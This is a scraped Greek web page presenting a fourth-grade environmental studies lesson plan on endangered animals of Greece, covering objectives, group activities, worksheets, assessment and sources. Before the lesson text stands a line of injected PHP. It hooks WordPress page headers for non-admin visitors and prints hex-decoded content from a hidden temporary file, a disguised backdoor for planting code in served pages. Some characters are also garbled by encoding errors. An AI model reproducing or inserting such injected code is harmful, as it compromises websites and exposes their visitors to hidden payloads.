if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } ΣΕΝΑΡΙΟ ΕΡΓΑΣΙΑΣ:”Ζώα υπό εξαφάνιση” |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

ΣΕΝΑΡΙΟ ΕΡΓΑΣΙΑΣ:”Ζώα υπό εξαφάνιση”

Σενάριο Διδασκαλίας
στη Μελέτη Περιβάλλοντος (Δ΄τάξη)
Δάσκαλοι: Κολενδριανού Αργυρώ
Παναγάκου Ισμήνη
Πληροφορικής: Κρυσταλλόγιαννη Ελένη

Τίτλος: ?Ζώα που κινδυνεύουν να εξαφανιστούν?

Στόχοι Δραστηριότητας: Γνωστικοί – Να αξιολογήσουν και να επιλέξουν πληροφορίες
– Να συνθέσουν περιληπτικό κείμενο
– Να γνωρίσουν τα ζώα της Ελλάδας που κινδυνεύουν
– Να αναζητήσουν τις απειλές που δέχονται τα ζώα
– Να αναγνωρίσουν ως κύρια αιτία του προβλήματος τις ανθρώπινες δραστηριότητες
– Να πληροφορηθούν και να καταγράψουν τις προσπάθειες που καταβάλλει η Πολιτεία για την προστασία της άγριας ζωής

Παιδαγωγικοί – Να αναπτύξουν δεξιότητες συνεργασίας
Στάσεις – Να διαμορφώσουν συνειδητή στάση ευθύνης απέναντι στο φυσικό περιβάλλον
– Να συμμετέχουν ενεργά σε δράσεις που συμβάλλουν στην προστασία του

Δεξιότητες – Να αποκτήσουν την ικανότητα να συλλέγουν τις κατάλληλες πληροφορίες για το θέμα που ερευνούν
– Να επικοινωνούν και να συνεργάζονται αποτελεσματικά

Προαπαιτούμενη γνώση: Τα ζώα του τόπου, οικοσυστήματα, ρύπανση, χειρισμό ηλεκτρονικού υπολογιστή.

Εκτιμώμενη χρονική διάρκεια: 16 ώρες

Είδος διδακτικής πρακτικής: Εποικοδομητική προσέγγιση- συνεργατική μάθηση ? εργασία σε ομάδες

Δραστηριότητες

1η Ένα βίντεο με διάφορα άγρια ζώα της Ελλάδας θα λειτουργήσει ως έναυσμα του ενδιαφέροντος των μαθητών. Ο προβληματισμός των μαθητών για την εξαφάνιση διάφορων ζώων στην Ελλάδα θα ξεκινήσει από ένα άρθρο μιας εφημερίδας με τίτλο « Υπό εξαφάνιση 171 είδη ζώων στην Ελλάδα»

Οι μαθητές χωρίζονται σε ομάδες.
Μοιράζονται φυλλάδια στους μαθητές που έχουν πληροφορίες για διάφορα ζώα της Ελλάδας που κινδυνεύουν να εξαφανιστούν . στη συνέχεια η κάθε ομάδα επιλέγει ένα ζώο και φτιάχνει περίληψη από τις σημαντικότερες πληροφορίες που υπάρχουν στα κείμενα των φυλλαδίων που πήραν.

Φύλλο εργασίας 1

Φτιάχνουν τις ταυτότητες των ζώων που επέλεξαν.

Ζωγραφίζουν γραμματόσημα για τα ζώα της χώρας που κινδυνεύουν να εξαφανιστούν.

2η Οι μαθητές ψάχνουν και βρίσκουν πληροφορίες για τις απειλές και τους κινδύνους που δέχονται τα ζώα. Από την έρευνα αναμένεται να αναγνωρίσουν ως βασική αιτία εξαφάνισης τις ανθρώπινες δραστηριότητες.

Φύλλο εργασίας 2

Φτιάχνουν ένα χάρτη της Ελλάδας. Βρίσκουν φωτογραφίες ζώων και τις κολλούν στο χάρτη ανάλογα με τις περιοχές της Ελλάδας όπου ζουν τα ζώα.

Συμπληρώνουν ένα «χάρτη από λέξεις» (Σχολικό εγχειρίδιο Μελέτη Περιβάλλοντος, Δ? τάξη)

Παίρνουν τη θέση ενός ζώου και στέλνουν ένα γράμμα στους ανθρώπους.

3η Οι μαθητές αναζητούν και καταγράφουν τις ενέργειες που γίνονται από τους διάφορους φορείς για την προστασία των ζώων.

Φύλλο εργασίας 3

Προτείνουν δράσεις που θα μπορούσαν να αναλάβουν τα ίδια τα παιδιά για την ενημέρωση και την ευαισθητοποίηση σε θέματα προστασίας της άγριας ζωής.

Φτιάχνουν αφίσες και φυλλάδια για την Παγκόσμια Ημέρα των Ζώων.

4η Ενημέρωση μαθητών του σχολείου για την προστασία των ζώων.

Αξιολόγηση

Αρχικά η αξιολόγηση γίνεται στις προαπαιτούμενες γνώσεις των παιδιών.
Η διαμορφωτική αξιολόγηση γίνεται καθόλη τη διάρκεια των φύλλων εργασίας.
Η τελική αξιολόγηση γίνεται γράφοντας ένα γράμμα, κι έτσι οι μαθητές αξιολογούνται στις προσλαμβάνουσες γνώσεις και ευαισθητοποιούνται.

Βιβλιογραφία
1. Μάθηση και Διδασκαλία στην Εποχή της Πληροφορίας, Αθήνα: Αριστ. Ράπτη
2. Ματσαγγούρας, Η ? Ομαδοσυνεργατική Διδασκαλία, Αθήνα: Γρηγόρης
3. Διδακτικό πακέτο Μελέτης Περιβάλλοντος Δ? Δημοτικό

Πηγές
1. ?Ζώα υπό εξαφάνιση? www.youtube.com
2. ?Κόκκινο βιβλίο των Απειλούμενων Ζώων της Ελλάδας? www.youtube.com

Λέξεις Κλειδιά σε αναζητήσεις: